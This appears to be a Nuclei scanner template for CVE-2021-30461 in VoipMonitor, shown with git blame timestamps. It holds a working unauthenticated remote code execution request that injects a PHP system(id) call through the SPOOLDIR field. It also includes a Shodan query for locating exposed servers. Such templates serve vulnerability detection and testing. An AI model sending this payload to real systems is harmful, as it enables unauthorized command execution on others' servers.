2021-05-07 12:30:10 +00:00
id : CVE-2021-30461
info :
2022-05-18 20:58:07 +00:00
name : VoipMonitor <24.61 - Remote Code Execution
2021-05-07 12:30:10 +00:00
author : shifacyclewala,hackergautam
severity : critical
2022-05-18 20:58:07 +00:00
description : |
VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30461
2022-05-18 21:10:42 +00:00
- https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-30461
cwe-id : CWE-94
2022-07-10 09:37:28 +00:00
metadata :
shodan-query : http.title:"VoIPmonitor"
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,rce,voipmonitor
2021-05-07 12:30:10 +00:00
requests :
- raw :
- |
POST /index.php HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
SPOOLDIR=test".system(id)."&recheck=Recheck
matchers-condition : and
matchers :
- type : word
words :
- "uid="
- "gid="
- "groups="
- "VoIPmonitor installation"
part : body
condition : and
- type : status
status :
- 200
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/17